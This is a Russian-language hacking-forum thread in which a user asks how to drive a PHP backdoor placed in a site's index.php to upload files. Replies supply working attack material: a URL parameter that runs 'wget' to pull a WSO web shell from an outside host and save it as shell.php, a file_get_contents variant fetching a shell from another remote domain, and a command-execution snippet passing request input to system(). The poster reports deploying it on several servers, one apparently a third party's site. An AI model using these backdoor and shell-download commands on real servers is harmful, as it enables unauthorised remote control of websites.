Форум АНТИЧАТ - Бэкдор php - загрузка файла

Страница 1 из 3

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Бэкдор php - загрузка файла (https://forum.antichat.xyz/showthread.php?t=428162)

skaska

25.07.2015 09:11

тестирую на своем сервере, на site.ru/ в файл, index.php (или в любой др файл читаемый в браузере) прописываю это бэкдор:

PHP код:


		
			
[COLOR="#000000"][CODE][COLOR="#0000BB"]
[/COLOR][/CODE][/COLOR]

не ругайте сильно - учусь... что мне нужно ввести в адресной строке, чтоб загрузить файл на сервер? вариант без использования куков, т е простой вариант есть? знаю, нужно исполнить команду: можно через eval,

типа site.ru/index.php?f=eval.......????

подскажите что ввести в адресной строке для загрузки файла на сервер именно для этого бэкдора, буду каждому благодарен!

grimnir

25.07.2015 11:06

.php?param1=eval&param2=wget http://site.com/wso.txt -O shell.php

как-то так,возможно вместо eval надо будет писать exec,system и т.д ,использовать кодирование,вместо wget curl

b3	25.07.2015 12:19

Код можно очень сильно сократить

skaska

25.07.2015 12:21

команда рабочая, спасибо... но работает не всегда, из 5 серверов на один загрузило удачно! на остальные выдает это

Код HTML:

Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name in /var/www/u2847619/data/www/adgstroy.ru/index.php on line 3

OK

иногда пишет ОК, по факту на серваке пусто.

права нужные (в загружаемой категории уже лежит рабочий шелл), вариации перебрал exec,system и вместо wget curl... в чем может быть загвоздка?

skaska

25.07.2015 12:24

Цитата:

Сообщение от b3

↑
Код можно очень сильно сократить

да можно знаю, иногда получается с таким вариантом:

Код:

http://site.ru/cashe.php?cmd=$url = "http://ышеу2.ru/data/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h);

опять же в меньше половины случаев(

b3	25.07.2015 12:30

Я имел другое ввиду, ваш код из первого поста можно сократить значительно, а использование eval прям в коде это паливо жестокое

faza02

25.07.2015 12:43

wget это системная функция, eval-то при чем?

b3	25.07.2015 12:49

Цитата:

Сообщение от None

Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name

Наверное потому что eval не явлется функцией, а там хз не буду утверждать 100%

koro	25.07.2015 12:51

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]])){ [/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"cmd"[/COLOR][COLOR="#007700"]]); echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]); echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]; die; }[/COLOR][/COLOR]

b3	25.07.2015 12:57

еще один хакер... давайте глупости писать не будем может?

Время: 16:41

Страница 1 из 3

Показывать 40 сообщений этой темы на одной странице